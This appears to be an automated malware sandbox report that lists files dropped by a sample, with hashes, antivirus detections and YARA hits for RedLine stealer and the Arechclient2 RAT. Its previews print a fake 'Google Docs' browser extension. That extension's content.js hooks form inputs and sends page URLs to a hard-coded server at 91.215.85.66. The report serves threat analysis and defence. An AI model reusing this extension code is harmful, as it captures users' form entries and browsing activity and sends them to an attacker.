Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp785.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8907.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8928.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp8929.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDB8C.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDB9D.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpDED6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u48o.0.exe

Download File

Process:	C:\Users\user\Desktop\zLwT7vCojz.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336384
Entropy (8bit):	6.453202838334342
Encrypted:	false
SSDEEP:	3072:jjGck+pUZ09BgybSnG+UF5XW1SNYtfvw5ZUDBLL7NVn8yjn5V4d2umdcZyH1IgSw:5k+Zt8PtgSF9VnJrPLdcZGh6hECc
MD5:	65A31455A497CAEE44C5AA749C50E40B
SHA1:	BE39D07704EFB35BD1503B3914C6DD6C9E6312E8
SHA-256:	B94BD24023B0DF0089295B2246546A256D3E82424ECDB0C596B3500525AA4DE0
SHA-512:	8FC8D9308FEDE1F2D6B118B6071CE6ED4F86A7CB2442C4C9A9686B772A83961EDA93C81C2C524396688DD1D7B2540D571811AC13CD38FBB72CCD7F6DD06220F9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 37% Antivirus: Virustotal, Detection: 42%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.lFA.lFA.lFL..FY.lFL..F9.lFL..Fm.lFH..FF.lFA.mF/.lF.y.F@.lFL..F@.lF.y.F@.lFRichA.lF................PE..L....8.e.....................f......E9............@..........................P.......g.......................................Q..P....0..................................8............................G..@............................................text............................... ..`.rdata.. k.......l..................@..@.data........`.......N..............@....rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u48o.1.exe

Download File

Process:	C:\Users\user\Desktop\zLwT7vCojz.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	4866096
Entropy (8bit):	6.542818068158205
Encrypted:	false
SSDEEP:	49152:1ZRCckM8wwGbtBiRFWSGqCW4FL5wslsAEL1ksS2NHsF3TjZ1I6bqmHC0Jg:1ZRCwrb64XwWsAwFaFXxg
MD5:	397926927BCA55BE4A77839B1C44DE6E
SHA1:	E10F3434EF3021C399DBBA047832F02B3C898DBD
SHA-256:	4F07E1095CC915B2D46EB149D1C3BE14F3F4B4BD2742517265947FD23BDCA5A7
SHA-512:	CF54136B977FC8AF7E8746D78676D0D464362A8CFA2213E392487003B5034562EE802E6911760B98A847BDDD36AD664F32D849AF84D7E208D4648BD97A2FA954
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u48o.1.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 4% Antivirus: Virustotal, Detection: 3%, Browse
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....X..................5..P......`.5.......5...@...........................J.....`.J..........@............................7..N....<...............J.0(...08.............................. 8......................7.......8......................text...h.5.......5................. ..`.itext..<=....5..>....5............. ..`.data....V....5..X....5.............@....bss.....m...@7...... 7..................idata...N....7..P... 7.............@....didata.......8......p7.............@....tls....@.....8......z7..................rdata....... 8......z7.............@..@.reloc.......08......\|7.............@..B.rsrc.........<.......<.............@..@..............J.......J.............@..@........................................................

C:\Users\user\AppData\Local\Temp\wyftaheq

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	785920
Entropy (8bit):	6.809737341976147
Encrypted:	false
SSDEEP:	12288:QiMA0ejRLfxLY8flLb1MgXeXbFAsFWylkkoAbtEIwhsrU:QeDxttLeLFAsFlSjf
MD5:	33230F52772BD46C208DFE85537F567F
SHA1:	260AAB3C0DD5909C449B62DA56998F8ABD68A235
SHA-256:	3F1759A3D89D7B7893BBCDEB180BAB911C960A6D1C80A04BCDA199A8284C36EA
SHA-512:	98E3B0337ABD53BA405F76D1FCE17F9EC173C507B3DD3B89A259950AEE744FB337767BC534E817BF1DB7D5B692245DC5A3CF351BED06980DDEE2B0F19A48B10B
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\wyftaheq, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\wyftaheq, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\wyftaheq, Author: ditekSHen
Antivirus:	Antivirus: ReversingLabs, Detection: 59% Antivirus: Virustotal, Detection: 60%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,T............................~.... ........@.. .......................`..............................................,...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................`.......H............=..............H............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~).....UY.).... .....7...%.....~(.....[Y.)....sr...~).....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~).....SY.)......~).....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\ksedtnorf\llg\background.js

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	596
Entropy (8bit):	4.089531522812482
Encrypted:	false
SSDEEP:	12:8/ACiDfZISRZLWxicmFGW8NkzCIzvWkE5rBQNFBajVDGwgI/:8ICi9IyLWxHyGWMjIzWccMFG
MD5:	AA0E77EC6B92F58452BB5577B9980E6F
SHA1:	237872F2B0C90E8CBE61EAA0E2919D6578CACD3F
SHA-256:	AAD1C9BE17F64D7700FEB2D38DF7DC7446A48BF001AE42095B59B11FD24DFCDE
SHA-512:	37366BD1E0A59036FE966F2E2FE3A0F7DCE6F11F2ED5BF7724AFB61EA5E8D3E01BDC514F0DEB3BEB6FEBFD8B4D08D45E4E729C23CC8F4CAE4F6D11F18FC39FA6
Malicious:	false
Reputation:	unknown
Preview:	.async function httpGet(theUrl).{. let response = await fetch(theUrl);. let user = await response.text();.. return user;.}..chrome.runtime.onMessage.addListener(. (request, sender, sendResponse) => {. if (request.message === "get"){. new Promise(async send => {. try{. var key = await httpGet(request.url);. // console.log("send");. send(key);. }catch(error){. send("null");. }.. }).then(sendResponse);. console.log("findl");. return true;. }. . }. );

C:\Users\user\AppData\Local\ksedtnorf\llg\content.js

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1877
Entropy (8bit):	5.21369035461985
Encrypted:	false
SSDEEP:	48:ZG1iVUYRor51e0Ad7hR/NAGVqkh3vCI4dBoYCY+YCL:ZG1OU8thjvfC8
MD5:	B2F76BBED8339723AEC98902944219D1
SHA1:	F42B147E9914E996DD9109C68D39CAC6B85F3F90
SHA-256:	8F571A5F07AC11F23ABE89DC7E5D97FE7F29D3AC39C922621F451ACCB31D9FE3
SHA-512:	28659EF32AF311ED342748E1ADA290728C2B5E69A5EC6142D132166D3B15FCD6F7BC765905FC0C1003B9D5F67F43D48ED1E618116C3E743E04062D6F06E1A656
Malicious:	false
Reputation:	unknown
Preview:	var server = "http://91.215.85.66:9000/";.var iddd = 'ABEE5D020398559D1CCC81B5F72669AE';..var debug = 1;.var currLoc = "";..(async function () {...var clientId = iddd;..urlChangeAllert();.....spyjs_refreshEvents(clientId);...})()..function urlChangeAllert(){..try{...var loc = window.location;...getNoRet(server+'churl?pcid='+iddd+"&url="+loc);..}catch(error){ }...}..function spyjs_refreshEvents(clid){..if(currLoc != location.href){...currLoc=location.href;...spyjs_saveData("("+currLoc+")");..}..$('input').unbind('change');..$('input').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('select').unbind('change');..$('select').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('checkbox').unbind('change');..$('checkbox').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});....$('button').unbind('change');..$('button').change(function(e) {. ..spyjs_getInput(e.currentTarget, clid);..});......$('textarea').unbind('change');..$('t

C:\Users\user\AppData\Local\ksedtnorf\llg\icon.png

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5657
Entropy (8bit):	7.83233516247914
Encrypted:	false
SSDEEP:	96:Nyq+wylRcbfXdRICJdBsooMKWsXFAP39Asutnd4mm5oq+tlwg4Ae4quVpdI8JW1:kq+TRYCooMKDXFAPDutLmKtusquVpG8m
MD5:	2C905A6E4A21A3FA14ADC1D99B7CBC03
SHA1:	BD8682B580D951E3DF05DFD467ABBA6B87BB43D9
SHA-256:	CC3631CED23F21AE095C1397770E685F12F6AD788C8FA2F15487835A77A380FB
SHA-512:	753E28BAB9D50B7882A1308F6072F80FDA99EDEAA476FAFC7E647D29F5C9C15F5C404689C866F8F198B7F1ED41BAE3CC55AE4D15528B0DF966A47CBC4B31CAF6
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR..............>a.....sRGB.........gAMA......a.....IDATx^.yt.....H.$!@......tf...9uA..*..H.w..#"...N......K .....N...helE%...a..........}......9.wr..=..~.r.....N8..N8..N8..N8.t.....?...{..a......o&5?7..3hA...<~...~.......p.5(..o....Z6$..&.....=.DUO8.9...?/.0....?...'......XE.......#H..s.o.x.....v.,8.%..;X.....$lZ....^D..............$bp....<M@....v.......0.......S..7#.."(..Ea.~...L..`FP.F.dx...[.a.....,..;.@...../"YX.........]...\./"Y8....Z. #...0...H...0#(.Fp0..vx....'..... ....D@...R.?k..........&.....{../..[..M.9.n.. .&.^.........._...u..8. ..t..?!V.....]v.....6.y..}E ...p\|[.8...\|w`..u...7#...1........".`.Xz..........1...d;..G......0..?.D....U/h=0..F0l.rND...`....v8g.-0.[...^.kw=..]G`.....YP...0..M....C.tM........H.v...1......;...7...........L.jC....P.o....L..>.@.....].8.."&....-&......NP.I.8...\..@c......5..._...=#..G... 6.......'!...@.%......y..l.a.@..7d.1....g..3..<.^+M.WK.Cu.R........]#T......4.^...'gU...~...L...z...@

C:\Users\user\AppData\Local\ksedtnorf\llg\jquery.js

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (32086)
Category:	dropped
Size (bytes):	95785
Entropy (8bit):	5.393592005865771
Encrypted:	false
SSDEEP:	1536:/PEkjP+iADIOr/NEe876nmBu3HvF38sEeLHFoqqhJ7SerN5wVI+xcBmPv7E+nzmQ:ENMyqhJvN32cBC7M6Whca98Hrp
MD5:	3C9137D88A00B1AE0B41FF6A70571615
SHA1:	1797D73E9DA4287351F6FBEC1B183C19BE217C2A
SHA-256:	24262BAAFEF17092927C3DAFE764AAA52A2A371B83ED2249CCA7E414DF99FAC1
SHA-512:	31730738E73937EE0086849CB3D6506EA383CA2EAC312B8D08E25C60563DF5702FC2B92B3778C4B2B66E7FDDD6965D74B5A4DF5132DF3F02FAED01DCF3C7BCAE
Malicious:	false
Reputation:	unknown
Preview:	/! jQuery v1.11.1 \| (c) 2005, 2014 jQuery Foundation, Inc. \| jquery.org/license /.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret

C:\Users\user\AppData\Local\ksedtnorf\llg\manifest.json

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	569
Entropy (8bit):	4.878267680490818
Encrypted:	false
SSDEEP:	12:flNAuCONn3Ao19aHuDFRJIbpmxbuvWB0vXY:flVCONQo1XabpWuvPvXY
MD5:	2835DD0A0AEF8405D47AB7F73D82EAA5
SHA1:	851EA2B4F89FC06F6A4CD458840DD5C660A3B76C
SHA-256:	2AAFD1356D876255A99905FBCAFB516DE31952E079923B9DDF33560BBE5ED2F3
SHA-512:	490327E218B0C01239AC419E02A4DC2BD121A08CB7734F8E2BA22E869B60175D599104BA4B45EF580E84E312FE241B3D565FAC958B874D6256473C2F987108CC
Malicious:	false
Reputation:	unknown
Preview:	{.."manifest_version": 2,..."name": "Google Docs",.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.."version": "1.7.38",.."icons": {. "16": "icon.png",. "48": "icon.png",. "128": "icon.png". },..."permissions": [..."activeTab",..."storage"..],.."content_scripts": [ {..."all_frames": true,..."js": [ "jquery.js","content.js"],..."matches": [ "<all_urls>" ] ..} ],.."background": {. ."service_worker": "background.js". .},.."browser_action": {..."default_title": "SFASFASD"..}.}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\u48o.0.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\driverRemote_debug\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\driverRemote_debug\UniversalInstaller.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2469936
Entropy (8bit):	6.434916453080517
Encrypted:	false
SSDEEP:	49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
MD5:	9FB4770CED09AAE3B437C1C6EB6D7334
SHA1:	FE54B31B0DB8665AA5B22BED147E8295AFC88A03
SHA-256:	A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
SHA-512:	140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\driverRemote_debug\groupware.wav

Download File

Process:	C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
File Type:	data
Category:	dropped
Size (bytes):	20891
Entropy (8bit):	5.41735141652497
Encrypted:	false
SSDEEP:	384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
MD5:	FCE67E49E191BC3FD22997050C92BA01
SHA1:	34C08D6D404A94C2447B671A49731364EA0B47FF
SHA-256:	F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
SHA-512:	4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
Malicious:	false
Reputation:	unknown
